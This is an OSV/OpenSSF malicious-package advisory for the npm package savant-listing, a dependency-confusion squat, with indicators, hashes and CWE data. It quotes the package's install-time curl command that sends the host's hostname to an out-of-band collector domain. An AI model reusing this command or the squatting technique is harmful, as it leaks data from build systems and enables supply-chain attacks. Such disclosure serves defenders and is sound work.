MAL-2026-5401

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5401
Published
2026-06-09T16:05:25Z
Modified
2026-06-09T17:16:27.775347350Z
Summary
Malicious code in savant-listing (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461)

savant-listing@999.9.9 is a dependency-confusion squat. package.json declares both install and postinstall lifecycle scripts that run curl https://d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online/info/?hostname=$(hostname), unconditionally exfiltrating the installer host's hostname to an out-of-band interaction (OAST/interactsh) collector on every npm install. The version 999.9.9 and description SAFE PoC - Demonstrates dependency confusion are consistent with a package published to the public registry to win version resolution over an internal package of the same name on victim build systems. The destination is a transient, attacker-controlled OAST subdomain not associated with any legitimate publisher; the harm fires automatically at install time without any user interaction.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T16:06:10Z",
            "versions": [
                "999.9.10"
            ],
            "sha256": "2d6b7c657fc5ab0647f053b2eea71bebc1d720e7a70abf0316323af2a9d849aa",
            "id": "IN-MAL-2026-004961",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.63530747Z"
        },
        {
            "modified_time": "2026-06-09T16:05:25Z",
            "versions": [
                "999.9.9"
            ],
            "sha256": "518fb2425e398b68afc0ced11b5ccf24fbcab3aae9c831b1a34a830c941f5963",
            "id": "IN-MAL-2026-004956",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.341667267Z"
        },
        {
            "modified_time": "2026-06-09T16:05:25Z",
            "versions": [
                "999.9.9"
            ],
            "sha256": "7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461",
            "id": "IN-MAL-2026-004955",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T16:59:44.240310521Z"
        },
        {
            "import_time": "2026-06-09T16:59:44.695269124Z",
            "versions": [
                "999.9.10"
            ],
            "sha256": "972304a7ce9c3b67c976d03f4c2769d33ec68e2ff01b358a8ab374793c7ce078",
            "id": "IN-MAL-2026-004962",
            "source": "amazon-inspector",
            "modified_time": "2026-06-09T16:06:10Z"
        }
    ]
}
References
Credits

Affected packages

npm / savant-listing

Package

Affected ranges

Affected versions

999.*
999.9.9
999.9.10

Database specific

indicators
{
    "domains": [
        "d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online"
    ],
    "evidence_files": [
        {
            "sha256": "a4c0237994ad97ad0dab04882a231e78076c22632c9f04b395a1f2943decd18a",
            "tlsh": "abe0617045108e3336d802a17c66950f9852fb2b041d9c544feb154d971d336117d317",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-ekMuvz54s6MjpQOMjogc55GS8OiQ/ZLo9E+siMG9vJi31LzICYyCwLV7XhUxaYuufkIkHgKrjr93YdVuiu7KyQ==",
                "sha1": "80788d649ee21b6a0bd0fd9d536f0bc3fa1d9b96"
            },
            "filename": "savant-listing-999.9.10.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json"